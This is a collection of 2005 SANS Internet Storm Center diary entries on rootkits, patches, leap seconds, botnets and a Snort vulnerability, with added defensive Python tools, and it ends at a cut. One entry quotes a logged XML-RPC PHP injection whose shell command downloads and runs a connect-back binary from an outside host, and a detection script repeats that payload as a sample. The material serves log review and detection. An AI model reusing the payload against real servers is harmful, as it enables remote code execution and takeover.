Published: 2005-10-31

Safemode rootkit & DRM

FWIW, there is a great analysis and commentary today on Mark's Sysinternals Blog of a rootkit made to run in safe mode. Thanks very much for the great rootkit detection work and writing, Mark!

F-Secure is also covering this in their blog.


Published: 2005-10-31

PHP and phpBB releases

We usually do not add news about software releases, but these two are very important ones.
The first is the new release of phpBB. This bulletin board system is very common and was the target of some Perl bots some time ago, due to a vulnerability in its code. So it is very important to keep up to date with the vendor.
The second is PHP itself. They just released version 4.4.1 and I would suggest keeping up to date on this one too...

Today we received a post about some Apache log entries showing attempts to exploit a vulnerability in another piece of PHP code, the xmlrpc.php script (here, WordPress's XML-RPC interface). The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml

<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability in xmlrpc.php. The injected text starts with ',''));, which closes the string literal and the call that the vulnerable XML-RPC library builds from the request and hands to eval(); the backtick expression that follows then runs as a shell command on the server, and the trailing /* comments out the rest of the generated code. According to their website the new release fixes some security vulnerabilities: "Note: all users are encouraged to upgrade to release 1.2 or later, since known exploits exist for earlier versions. All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
Pedro Bueno ( pbueno //%// isc. sans. org)
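The request quoted above, run through a small log-review check. This is an added example, not code from the diary or from the XML-RPC for PHP project: it pulls the text out of the name, methodName, string and value elements of a POST body and reports fragments that only make sense if the text were being spliced into PHP source (a closing quote followed by a comma or parenthesis, backtick command substitution, chained echo/exit statements, a /* that comments out whatever follows). It uses regexes rather than an XML parser on purpose, because the quoted body is not well-formed (there is no opening params element) and a strict parser would reject it before you saw the payload. The marker regexes, their labels and the benign pingback request are my own constructions; the first sample is the body quoted above with the IPs as printed there.

```python
"""Flag XML-RPC request bodies carrying PHP/shell injection in element text."""
import re
from html import unescape
from typing import List, Tuple

# What a legitimate method or struct-member name looks like
SAFE_NAME = re.compile(r"^[A-Za-z0-9._:/-]+$")

# Fragments that only make sense if the text is being spliced into PHP source
INJECTION_MARKERS = (
    ("php-string-breakout", re.compile(r"'\s*[,)]")),            # ',''))  ends a string literal and a call
    ("backtick-exec",       re.compile(r"`[^`]+`")),             # `...` is shell execution in PHP
    ("statement-chain",     re.compile(r";\s*(echo|exit|eval|system|passthru|shell_exec)\b")),
    ("comment-out-rest",    re.compile(r"/\*")),                 # hides the library's remaining code
    ("download-and-run",    re.compile(r"\b(wget|curl|chmod\s+\+x)\b")),
)

# Elements whose text the library interpolated. Regex, not an XML parser: the quoted
# body is not well-formed and a strict parser would reject it outright.
ELEMENT = re.compile(r"<(name|methodName|string|value)>(.*?)</\1>", re.S)
TAGS = re.compile(r"<[^>]+>")


def scan_xmlrpc_body(body: str) -> List[Tuple[str, str, str]]:
    """Return (element, marker, excerpt) findings for one POST body; [] if clean."""
    findings: List[Tuple[str, str, str]] = []
    seen = set()
    for m in ELEMENT.finditer(body):
        tag, raw = m.group(1), m.group(2)
        text = unescape(TAGS.sub("", raw)).strip()       # innermost text only
        hits = [label for label, pat in INJECTION_MARKERS if pat.search(text)]
        if tag in ("name", "methodName") and text and not SAFE_NAME.match(text):
            hits.append("non-name-characters")
        for label in hits:
            if (label, text) not in seen:                # nested <value><name> would double-report
                seen.add((label, text))
                findings.append((tag, label, text[:60]))
    return findings


# Constructed samples. The first is the body quoted in the entry above (IPs as printed there).
ATTACK_REQUEST = (
    "<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;"
    "chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value>"
    "</param></params></methodCall>"
)
BENIGN_REQUEST = (   # an ordinary pingback call, made up for contrast
    '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params>'
    "<param><value><string>http://blog.example/2005/10/post</string></value></param>"
    "<param><value><string>http://other.example/notes</string></value></param>"
    "</params></methodCall>"
)

if __name__ == "__main__":
    for label, body in (("attack", ATTACK_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, scan_xmlrpc_body(body) or "clean")
```

Feed it the request bodies your web server or proxy logs (Apache access logs do not record POST bodies; mod_security or a full-packet capture does). A hit on any marker is worth a look; a hit on backtick-exec or download-and-run together with php-string-breakout is the pattern above.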


Published: 2005-10-31

Leap second: when time stands still

Just after we in the US changed our clocks back an hour from daylight saving time to standard time I ran across an interesting tid-bit regarding time. This may have impacts across many information systems.
                      UTC TIME STEP
on the 1st of January 2006

A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:

2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s

see: http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

This is being done to keep UTC, which is kept by atomic clocks, in step with the Earth's slowing rotation. There have been several leap seconds introduced since 1972.

My original source for this information is the November 2005 Scientific American article by Wendy Grossman.  The impacts on information systems can come from GPS clocks (and other time sources) not recognizing the leap second and sending out flawed or inaccurate time, which can affect many time-based functions, including security features (log timestamps and correlation, certificate and Kerberos ticket validity windows).  According to the article there is talk within the International Earth Rotation and Reference Systems Service (IERS) of decoupling standard time measurement from the Earth's rotation and adhering strictly to atomic time.

NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html

Scientific American article here.

Happy travels through time ...
Dan Goldberg
Dan at madjic dot net
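One concrete place the step above bites information systems is log parsing: Python's datetime.strptime() refuses a seconds field of 60, so a pipeline built on it drops (or crashes on) every event stamped during the inserted second. The helper below is an added example, not part of Dan's entry: it accepts 23:59:60 only where IERS schedules leap seconds (23:59 UTC on 30 June or 31 December, the only dates used so far), maps it onto POSIX time and flags it. The mapping convention is an assumption of this example: the leap second gets the same POSIX value as 23:59:59, which is what a kernel that repeats that second produces. The log lines are constructed.

```python
"""Accept the leap second 23:59:60 when parsing UTC timestamps from logs."""
import re
from datetime import datetime, timezone
from typing import List, Tuple

STAMP = re.compile(r"^(\d{4})-(\d{2})-(\d{2})[T ](\d{2}):(\d{2}):(\d{2})(?:Z|\+00:00)?$")


def parse_utc(stamp: str) -> Tuple[int, bool]:
    """Return (posix_seconds, is_leap_second) for an ISO-style UTC stamp.

    A :60 is accepted only at 23:59 UTC on 30 June or 31 December and is mapped
    onto the POSIX value of 23:59:59 (repeated second; an assumption of this
    example). Every other field is range-checked by the datetime constructor.
    """
    m = STAMP.match(stamp.strip())
    if not m:
        raise ValueError(f"unrecognised UTC timestamp: {stamp!r}")
    y, mo, d, h, mi, s = (int(g) for g in m.groups())
    if s == 60:
        if (h, mi) != (23, 59) or (mo, d) not in ((6, 30), (12, 31)):
            raise ValueError(f"second 60 only valid at 23:59:60 on 30 June or 31 December: {stamp!r}")
        base = datetime(y, mo, d, 23, 59, 59, tzinfo=timezone.utc)
        return int(base.timestamp()), True
    dt = datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)
    return int(dt.timestamp()), False


def sort_events(lines: List[str]) -> List[str]:
    """Order 'stamp message' lines so 23:59:60 lands after 23:59:59, not on top of it."""
    keyed = []
    for line in lines:
        stamp, _, msg = line.partition(" ")
        posix, leap = parse_utc(stamp)
        keyed.append(((posix, leap), stamp, msg))      # bool sorts False < True
    return [f"{stamp} {msg}" for _, stamp, msg in sorted(keyed)]


# Constructed log lines spanning the step announced above (out of order on purpose)
LOG = [
    "2006-01-01T00:00:00Z ntpd: leap second inserted",
    "2005-12-31T23:59:60Z sshd: accepted password for alice",
    "2005-12-31T23:59:59Z sshd: failed password for alice",
]

if __name__ == "__main__":
    try:
        datetime.strptime("2005-12-31T23:59:60Z", "%Y-%m-%dT%H:%M:%SZ")
    except ValueError as exc:
        print("strptime rejects the leap second:", exc)
    for line in sort_events(LOG):
        print(line, parse_utc(line.split(" ", 1)[0]))
```

Whatever convention you pick for the repeated second, pick the same one on every host that feeds the correlation engine; otherwise events from the same second land in different orders depending on where they were logged.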


Published: 2005-10-31

(Another) AOL Pwstealer

Just a quick note about (another) password stealer that we received today, focused on AOL. This one is not detected by any AV on VirusTotal yet, although after I sent it to my personal AV list, some already answered that it will be included in the next signature release.
This one had the name new_pict.exe, maybe trying to fool the person into clicking on an attachment.

If you run this file you will get this screen asking for a screen name and password.

Pedro Bueno ( pbueno //%// isc. sans. org)


Published: 2005-10-31

Email From Beyond - Tell us your own Halloween stories

I'll start the Halloween ball rolling with a story of my own...  Send along your own tale of Internet strangeness, and around Midnight (GMT), I'll post some of the best...

I had known him for about 10 years when he died, too young, too soon.  He was the President of our local School Board, I was the Vice President.  We worked closely together on all of the topics and issues that face a School Board over the years.  Even through the times when the cancer made it difficult for him to go on.  He was that kind of man.

His name was John, and he was more than just my colleague... he was my friend.

He was also what I would call a computer nerd wannabe.  He loved genealogy and created incredibly detailed databases of his own designing.  He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me.  But when things got beyond the world of his pre-packaged software, he was out of his depth.  That's when I'd get a call.

I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices.  But I could never get frustrated with him.  The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.

The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral.  What would I say?  How could I possibly sum up a life?

The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board.  On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.

I wrote.  I wrote for about two hours, putting down a listing of accomplishments, accolades, and achievements.  With each new item that I listed, a weight seemed to press down on me, more and more.  It just wasn't right.

Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message.  I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.

The subject line read: "Thank you"

I flipped back over to Word, and opened a new document.  In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you."  Thank you for all that you were.  Thank you for the difference you made.  Thank you for being you.

Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened.  One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."

I still have that message, unopened, at the bottom of my in-box.


Published: 2005-10-31

DST Cisco Surprise

Doh!  It seems that certain Cisco IPS systems can spit up a core file and go all brain-dead within 24 hours after a transition to or from daylight saving time.  You'll need a CCO password to view the Cisco bulletin found here.


Published: 2005-10-30

Don's Halloween Trick

The links in my diary entries are not clickable. I am trying to make a point. If you want to visit the URLs in question, either type the URL or cut and paste it into a browser.


Published: 2005-10-30

SANS offering TREATS too.

Would you like access to the next SANS Security Career survey results?
Survey: Information Security Career Advancement Survey now available.
Complete the survey by November 10 to receive a copy of the results.


Published: 2005-10-30

Sweet Treats from the Honeynet group.

The Honeynet Project and Research Alliance are pleased to announce the
release of mwcollect v3.0.0 on http://www.mwcollect.org/ .

Mwcollect is a distributed malware collector network. A mwcollect network is composed of one or more mwcollectd sensors, an optional database to store collected binaries, and optional redirect servers that forward specific ports to the mwcollectd sensors. Mwcollectd sensors simulate vulnerable services, so spreading malware tries to exploit those services. The mwcollectd daemon then parses the exploit packets, searches them for the shellcode, interprets the shellcode, and then takes further actions to download the malware. The malware can then be submitted to a database or stored on the local filesystem. The redirect servers act as NATted gateways to forward specific ports to the mwcollectd servers. This provides greater IP address space coverage with fewer full-blown mwcollectd servers.

What's new?
The core has been completely rewritten. It is now even more modularized
and has proven to be very stable. Integration of libCURL for http/ftp
downloads is now threaded and therefore does not result in an increased
CPU usage. Mwcollect v3.0.0 is much more suited for future extensions
and is the important step from the proof of concept that v2.x.x was to a
real mature product. Mwcollect is now licensed under the GPL, (c) by
Honeynet Project.

Obtaining mwcollect
You can download a compressed .tar.bz2 source package from
http://download.mwcollect.org/ .


Published: 2005-10-30

Microsoft attacks Zombie Masters.

If you're an average user, something like 50% of the spam you get comes from infected home computers that have been turned into spam zombies. These spam zombies are used by spammers to send spam without revealing their actual network address. The spammers provide the spam content to the zombies and the zombies send the spam to the victims.
From http://spamkings.oreilly.com/archives/2005/10/microsofts_decoy_zombie.html
Microsoft said it has filed "John Doe" lawsuits against the operators of 13 spam organizations that use illegal "zombie" computers to send their spam. The company held a press conference today with officials from the Federal Trade Commission to announce the lawsuits, filed in Washington State's King County court on August 17.
From an interview with Tim Cranton http://spamkings.oreilly.com/cranton.mp3

Microsoft has taken a new approach to security, in particular on the enforcement side. They took a clean computer and infected it with a common malicious code. That code turned the computer into a spam zombie. A spam zombie is a computer connected to the Internet that has been infected and checks in with the zombie controllers to let them tell it what to do. Microsoft documented 5 million connections used to send over 18 million spam messages in less than 3 weeks. This was just one computer. There are reported to be thousands of spam zombies out there. Microsoft cordoned their spam zombie off the net so it could not be used to actually send the spam. Microsoft filed a lawsuit and contacted ISPs to try to discover who is really sending the spam.

The SANS news bites letter has additional information on this.


Published: 2005-10-30

Reminder: Daylight Savings Ends Sunday At 02:00

A reminder for everyone in the US that Daylight Savings ends tonight (or early tomorrow morning -- depending how late you stay up ;) ) at 02:00 AM.  Remember to set your clocks back.


Published: 2005-10-29

Incident Handling: Home Heating 101

Every winter we get suggestions, warnings, etc. to have our furnaces checked out before the cold season to make sure they are safe to use, to ensure that they won't burn our house down while trying to heat it.  I have central AC/heat at home so the same air handler is used year round.  When it's hot, the outside compressor cools the air and when it's cold, the gas furnace heats the air.  The air handler had been working fine without problems until this incident.

Several days ago it finally got cold enough in Virginia to require using the furnace to heat the house so we flipped the switch on the thermostat from Cool to Heat.  The furnace worked fine and we had whole-house heat for a couple of days.  Two days ago I came home and the house was cold.  I checked the circuit breaker in the electric panel and it wasn't tripped.  I checked the light in the utility room (same circuit as the furnace) and it wouldn't come on.  Changed the light bulb -- no joy.  Flipped the circuit breaker off and back on -- no joy.  I went back upstairs to think of other ideas to try before calling an HVAC contractor when all of a sudden, a few minutes later the furnace turned on and started working just fine.

The furnace ran that evening and into the night but sometime early in the morning, it stopped working again.  I called an electrician and got someone to come out to take a look at it that afternoon.  He started with the furnace.  It seemed ok.  Tested the new light bulb -- it was good.  Tested the light socket and was surprised to get a voltage reading on the neutral wire.

So he went to the main electric panel for the house, removed the panel cover to expose the wiring connections to the circuit breakers and neutral bars and found quite a surprise.  Instead of one neutral wire for each circuit being secured by one lockdown screw on the neutral bar, there were a number of instances of two or three wires under one screw.  In the case of the furnace circuit, there were four wires under one screw.  The screws were loose so the wires had been intermittently shorting and sparking.  Had lots of nice black soot from the arcing in there.  He was really "shocked" at the condition of the wiring in there -- no way it could have passed an inspection as it was.  He rewired the box correctly and the furnace works fine now.

So in this incident, it appeared that the problem was with the furnace since the air handler had been working fine for months cooling air and just shortly after starting to use the furnace for heat was when we had problems.  But it turned out to be an external component (the electrical circuit) that the furnace depended on.

How does this relate to information security?  Well, similar incidents can occur.  If we get alerted that a system on our network has been compromised, the first place our attention is usually directed is to the compromised system and then perhaps the firewall, to ensure we are only allowing the appropriate access.  We may need to look elsewhere on our network to find the cause of the problem or the access vector that is open.  Perhaps someone has added a wireless access point or has a dial-in modem attached to a workstation.  Oftentimes we need to look beyond the immediate likely cause to find the actual cause.

Have a safe weekend and Happy Halloween Monday night.  It looks like it's supposed to be dry and cold here so I'm glad my furnace works now.

Dave Goldsmith


Published: 2005-10-29

Botnet Malware code modifier's competition continues

Trend Micro's analyses of WORM_MYTOB.KV and WORM_FANBOT.H mention some strings in the HOSTS file indicative of the ever-ongoing competition between the botnet malware "modifiers", including the strings:
 "HellBot3 have BackDoor in 'HellMsn.h'. The HellBot3 author is an idiot!!!
Play with The best, Die like the rest."
Sheesh, upon reflection, the strings above make me miss Gobbles, whose flames rank right up there as all-time classics.


Published: 2005-10-29

Ethereal Advisory

In case you missed it last week, iDefense released an advisory regarding Ethereal, the very popular open source protocol analyzer. Several buffer overflow and DoS vulnerabilities are corrected with the latest release, version 0.10.13.

From http://www.ethereal.com/appnotes/enpa-sa-00021.html:
"It may be possible to make Ethereal crash, use up available memory, or run arbitrary code by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file."

The iDefense advisory is at: www.idefense.com/application/poi/display?id=323&type=vulnerabilities

There is exploit code for at least one of the BOF vulns. Now, who uses Ethereal, anyway? Net admins, incident handlers, auditors, analysts....nothing important to worry about on their systems, eh?

A great way to avoid getting bitten badly by these protocol parser attacks is to not run them as a super user, if you don't have to. Do your packet capturing with something dumb (like tethereal or tcpdump with the -w switch), then analyze as a non-priv user. This way an attacker is limited in the damage that can be done, should they slide the evil bits into your sniffer.


Published: 2005-10-29

Escaping the P2P-induced alert onslaught

Eric Hughes was plagued with what, at first, looked like a DoS on his system. As it turns out, he was the lucky renter of an IP address that a busy P2P net believed was a willing participant. After being pounded for days and his firewall logs bursting at the seams, he opted for a new DHCP-assigned IP address. Unfortunately, many ISPs aren't terribly responsive to such requests, so he took matters into his own hands & changed his MAC address. Release & renew and bingo... no more nasty UDP trash-o-grams filling his logs.


Published: 2005-10-29

Defeating A/V by inserting forged data

Andrey Bayora (GCIH, dontja know) has released an advisory regarding an insertion-style attack to slide certain malicious content past many antivirus products. http://www.securityelf.org/magicbyteadv.html and the accompanying white paper http://www.securityelf.org/magicbyte.html describe fooling the scanners' file-typing routines by prepending executable-looking file headers to a script. The interpreter that actually runs the script ignores the extra leading bytes, while the A/V types the file from the prepended header and stops evaluating it before it reaches the malicious script, code, etc. Andrey has let us know he has been contacted by some vendors, and that he is aware that Trend has issued a letter to their customers on this issue.


Published: 2005-10-27

An Assessment of the Oracle Password Hashing Algorithm

Handler Joshua Wright and Dr. Carlos Cid from the Information Security Group at the Royal Holloway, University of London have published a paper describing the inner workings and vulnerabilities in the Oracle password hashing algorithm. A copy of the paper is available through the SANS Reading Room at http://www.sans.org/rr/special/index.php?id=oracle_pass.

The authors' findings indicate that the password hashing algorithm is weak and subject to a number of attacks. If an attacker is able to obtain Oracle password hash information from a compromised system, through traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommends several actions Oracle DBAs can take to help mitigate this threat.

The SANS Institute contacted the Oracle product security team about these findings on 7/12/2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to resolve these vulnerabilities through the appropriate channels.


Published: 2005-10-25

New Skype vulnerabilities

Our avid reader and contributor Juha-Matti let us know that there are two new vulnerabilities in the free IP telephony software Skype.

CVE entries: CVE-2005-3265

Secunia advisory: http://secunia.com/advisories/17305/

Please upgrade to the new version ASAP, they have been rated highly critical by Secunia, and high by Skype.

Download here: http://www.skype.com/download/

Adrien de Beaupre



Published: 2005-10-25

Exploit for Snort BO available!

So, it looks like there is finally an exploit publicly available for the Snort BO pre-processor vulnerability.
Our good reader Juha-Matti sent a note about an exploit published by FrSIRT, formerly known as K-Otik.
On the good side, our handler Kyle Haugsness created a tool and some Snort signatures that can detect them!
I just tested it against the exploit and it really works! ;-) You can find it here.

If you haven't patched yet or applied the workarounds, do you need more reasons?


Published: 2005-10-24

Is hurricane Wilma affecting you?

We've had one report about DNS resolution failures with verio.net in Boca Raton that may have been caused by hurricane Wilma. If you're aware of any other problem reports/information please let us know and it will be correlated and posted here.

We've recently received an additional report that mentioned "I've not been able to reach any of my sites hosted there since about 0830 EDT. " Thanks Fred!


Published: 2005-10-24

UDP traffic to port 50368

A reader (Bill) reported that he is seeing a substantial increase in UDP port 50368 traffic getting blocked by the firewall. The traffic appears to originate from Europe, and uses numerous source ports (but many of them are "well known").

Here is a quick sample of sources and source ports:

No idea what's causing that. We have almost no other traffic to this port in our database. If you see any outbound traffic like that, let us know.


Published: 2005-10-24

deja vu - "25 new unpackers added in one week"

"25 new unpackers added in one week"

Yup, that's 25 new unpackers in one week, and there's other "deja vu" data at Kaspersky.

And Websense published a whitepaper of the "JS/Wonka" encoding technique.


Published: 2005-10-24

A new botnet - Mocbot

A new botnet is making the rounds. And guess who was the first to notify us.  Our very own Handler Patrick Nolan.  He even beat our primary informant, Juha-Matti.  Way to go Patrick.

This botnet client has been spread using the MS05-047 vulnerability, their entry continues.

McAfee has information at:

This is a heads-up for some, since botnet owners are using it to further exploit networks they already have a presence on. If you haven't already patched, you may want to do so now.

Update: McAfee and F-Secure have since amended their write-ups; this botnet exploits MS05-039, not MS05-047.


Published: 2005-10-24

Stopping Spam by Extrusion Detection

It was a somewhat quiet day on the Internet today as far as the bad guys go.  We did however receive some really good emails in the mailbag with interesting tid-bits.  One that I particularly liked was sent to us by one of our faithful readers, Chris Edwards.  He was commenting on spam filtering and included a link to an article at:

This is an excellent article by Richard Clayton, University of Cambridge in the UK.  I am very intrigued by the information that was supplied in this article.  Richard has provided some very helpful tips.  Thanks Chris for bringing this to our attention.


Published: 2005-10-24

Exploit circulating for newly patched Oracle bug

We also received an email from our very own handler Koon Yaw Tan with a link to an article at Computer World regarding an exploit circulating for the Oracle bug.


Those of you who use Oracle may want to take a look at the article and consider getting your systems patched.



Published: 2005-10-22

Possible Problem with MS05-050 Patch

If you have manually downloaded and installed the patch for MS05-050, you may want to check again to make sure you have the correct patch. Microsoft has recently released a Knowledge Base article, "The computer may not be updated after you install the "Security Update for DirectX 7.0 for Windows 2000 (KB904706)" on a Windows 2000-based computer that is running DirectX 8 or DirectX 9".

According to Microsoft, this only applies if:
• You are running Microsoft Windows 2000
• Microsoft DirectX 8.0 or DirectX 9.0 is installed on the computer

This is likely because the wrong patch package (the DirectX 7.0 one) was manually downloaded and installed. If you installed through the Microsoft Windows Update website, you should be protected and free from this problem.

To check whether your system is correctly updated, verify the version number of Quartz.dll. The steps are detailed in Microsoft KB article 909596.


Published: 2005-10-22

Exploit Code for MS05-047

We have received several emails from our readers about exploit code for MS05-047 (Microsoft Windows Plug and Play "Umpnpmgr.dll" remote exploit). By now I hope you have gotten all your systems patched.


Published: 2005-10-21

Snort signature and standalone detection tool

(Kyle Haugsness)  As promised, here is a Snort signature to detect exploit attempts against the Back Orifice pre-processor vulnerability announced this week.  There is a fatal flaw with this signature, which will reduce its overall effectiveness when the attackers get smarter.  But I'm not going to disclose the fatal flaw.  In order to avoid the fatal flaw and detect all attacks, you will need to run the standalone program that is available here: http://handlers.sans.org/khaugsness/

Here's the Snort signature.  Don't forget to turn off the BO pre-processor in snort.conf if you are running a vulnerable version!  Also, don't forget to change the "sid" field below...

alert udp any !31337 <> any !31337 ( \
msg: "BLEEDING-EDGE EXPLOIT Snort Back Orifice pre-processor buffer overflow attempt"; \
dsize: >1024; \
content:"|ce 63 d1 d2 16 e7 13 cf|"; \
offset: 0; \
depth: 8; \
threshold: type limit, track by_dst, count 1, seconds 60; \
classtype: attempted-admin; \
sid: 3000001; \
rev:1;)
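Kyle's standalone tool (described in his 20 October update further down this page) decodes the BO encryption itself, so its check does not depend on any particular key. What follows is an added example in the same spirit, written for this page; it is not Kyle's tool and not code from the diary. BO1 encrypts every datagram with a keystream from the MSVC rand() linear congruential generator seeded by a 16-bit key, and every plaintext begins with the magic string *!*QWTY?, so the key can be recovered by trying all 65536 seeds against the first eight bytes; the decoder then applies the same 1024-byte dsize threshold the rule above uses and skips port 31337 as the rule does. The cipher constants are those of the public BO1 protocol as Snort's spp_bo.c implements it (32-bit wraparound assumed; verify against that source); the sample datagrams are constructed magic-plus-filler, not exploit code.

```python
"""Decode Back Orifice datagrams and flag ones over the Snort 2.4.x pre-processor's size threshold."""
from typing import Dict, List, Optional, Tuple

BO_MAGIC = b"*!*QWTY?"      # plaintext header of every BO1 packet
BO_DEFAULT_PORT = 31337     # traffic on this port is skipped, as the rule above does
OVERFLOW_DSIZE = 1024       # same threshold as the rule's "dsize: >1024"


def bo_keystream(seed: int, length: int) -> bytes:
    """BO's cipher: holdrand = holdrand*214013+2531011; byte = (holdrand>>16) & 0xff."""
    holdrand = seed
    out = bytearray()
    for _ in range(length):
        holdrand = (holdrand * 214013 + 2531011) & 0xFFFFFFFF   # 32-bit long wraparound
        out.append((holdrand >> 16) & 0xFF)                      # == BoRand() % 256
    return bytes(out)


def bo_xor(data: bytes, seed: int) -> bytes:
    """Encrypt or decrypt; the cipher is a plain XOR with the keystream."""
    return bytes(b ^ k for b, k in zip(data, bo_keystream(seed, len(data))))


_MAGIC_TABLE: Dict[bytes, int] = {}   # ciphertext of the magic -> seed, built on first use


def find_bo_key(payload: bytes) -> Optional[int]:
    """Return the 16-bit seed under which the first 8 bytes decrypt to BO_MAGIC, else None."""
    if len(payload) < len(BO_MAGIC):
        return None
    if not _MAGIC_TABLE:
        for seed in range(0x10000):
            _MAGIC_TABLE[bo_xor(BO_MAGIC, seed)] = seed
    return _MAGIC_TABLE.get(bytes(payload[:8]))


def inspect_udp(src_port: int, dst_port: int, payload: bytes) -> str:
    """Verdict for one UDP datagram, the kind of line a libpcap-based checker would print."""
    if BO_DEFAULT_PORT in (src_port, dst_port):
        return "skipped"                        # port 31337 is excluded, like the rule above
    key = find_bo_key(payload)
    if key is None:
        return "not-bo"
    if len(payload) > OVERFLOW_DSIZE:
        return f"bo-overflow-attempt key={key} dsize={len(payload)}"
    return f"bo-traffic key={key} dsize={len(payload)}"


def make_bo_datagram(seed: int, size: int) -> bytes:
    """Constructed test datagram: magic plus filler, encrypted under seed (no exploit payload)."""
    plain = (BO_MAGIC + b"A" * size)[:size]
    return bo_xor(plain, seed)


# Constructed sample "capture": (src_port, dst_port, payload)
SAMPLE_CAPTURE: List[Tuple[int, int, bytes]] = [
    (40000, 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                b"\x07example\x03com\x00\x00\x01\x00\x01"),   # an ordinary DNS query
    (4444, 9999, make_bo_datagram(31337, 64)),      # BO under the default key, small
    (4444, 9999, make_bo_datagram(12345, 1100)),    # non-default key, over the 1024 threshold
    (4444, 31337, make_bo_datagram(12345, 1100)),   # same, but on 31337: not inspected
]

if __name__ == "__main__":
    for src, dst, data in SAMPLE_CAPTURE:
        print(f"{src:>5} -> {dst:<5} {inspect_udp(src, dst, data)}")
```

Building the 65536-entry table costs well under a second and happens once; after that each datagram is one dictionary lookup, which is cheap enough to run over a full capture.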


Published: 2005-10-21


There's a new variant of SDBOT making the rounds, arriving via IM as a link to a file called parishilton.scr. The few AV products that already detect it seem to call it Sdbot.XD.  Maybe a good moment to check your proxy logs to see which of your IM users clicked on it...


Published: 2005-10-21

Outage on Verio and Level3

We are getting reports that the Level3 and Verio networks are flaky or down at the moment. We'll update this entry if we get any news. 07:40 UTC: Things are slowly going back to normal. Rumour has it that a software upgrade at Level3 went awry.


Published: 2005-10-21

Getting spamfiltered?

Every now and then, collective spam filtering efforts tend to go a bit overboard. We keep hearing of cases where static and properly assigned IP ranges of legitimate businesses erroneously got added to one of the DNSbl-based public filter lists under the heading of "dynamic address".  Should this ever happen to you, chances are you won't be able to use your company email to complain about the mistake: since your email is coming from a "dynamic address" (or so the many mail gateways using the DNSbl think), it will be cheerfully ignored and discarded. Recovery from such a problem can be agonizingly slow and leave your company stranded high and dry with very limited ability to send email.  If you have a couple of spare cycles today, it might be worthwhile to go through the motions of how you would a) detect that your IP range is on some DNSbl and b) go about getting it unlisted again. A good toolkit I like for checking multiple DNSbls is the set of query options available through http://openrbl.org . Another good one, suggested by ISC reader Peter Bance, is http://www.dnsstuff.com . ISC reader Bas Janssen suggests the blq Perl scripts at http://freshmeat.net/projects/blq/ for automatic monitoring of several blocklists via a cron job.
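Going through the motions of (a), as an added example that is neither the diary's code nor the openrbl, dnsstuff or blq tools it names: a DNSbl lookup reverses the address's octets (or, for IPv6, its 32 hex nibbles) under the list's zone and treats an A record in 127.0.0.0/8 as a listing, with NXDOMAIN meaning not listed. The resolver is injectable so the code runs offline against constructed answers; the zone names here are placeholders rather than real lists, and the 127.0.0.0/8 convention and the meaning of individual return codes are things to confirm in each list's own documentation. Point it at the system resolver and your own ranges from cron to get the early warning the entry argues for.

```python
"""Check an address or range against DNS blocklists (DNSBLs)."""
import ipaddress
import socket
from typing import Callable, Dict, Iterable, Optional

Resolver = Callable[[str], Optional[str]]
LISTED_RANGE = ipaddress.ip_network("127.0.0.0/8")   # DNSBLs answer listings from here


def dnsbl_query_name(address: str, zone: str) -> str:
    """Reverse the address under the list's zone: 1.2.3.4 -> 4.3.2.1.<zone>."""
    ip = ipaddress.ip_address(address)
    if ip.version == 4:
        labels = reversed(str(ip).split("."))
    else:                       # IPv6 lists take the 32 hex nibbles, reversed
        labels = reversed(ip.exploded.replace(":", ""))
    return ".".join(labels) + "." + zone.strip(".") + "."


def system_resolve(name: str) -> Optional[str]:
    """A record for name, or None on NXDOMAIN (the 'not listed' answer)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def check_address(address: str, zones: Iterable[str],
                  resolve: Resolver = system_resolve) -> Dict[str, str]:
    """Return {zone: answer} for every zone that lists the address.

    Only answers inside 127.0.0.0/8 count as listings. Anything else is reported
    as 'unexpected:<answer>': a resolver that rewrites NXDOMAIN into a real
    address would otherwise make every zone look like a listing.
    """
    result: Dict[str, str] = {}
    for zone in zones:
        answer = resolve(dnsbl_query_name(address, zone))
        if answer is None:
            continue
        if ipaddress.ip_address(answer) in LISTED_RANGE:
            result[zone] = answer
        else:
            result[zone] = f"unexpected:{answer}"
    return result


def check_range(cidr: str, zones: Iterable[str],
                resolve: Resolver = system_resolve) -> Dict[str, Dict[str, str]]:
    """Run check_address over every address in the range; returns only the listed ones."""
    zones = list(zones)
    hits: Dict[str, Dict[str, str]] = {}
    for ip in ipaddress.ip_network(cidr, strict=False):
        listed = check_address(str(ip), zones, resolve)
        if listed:
            hits[str(ip)] = listed
    return hits


# Constructed answers standing in for real DNS so this runs offline; zones are placeholders.
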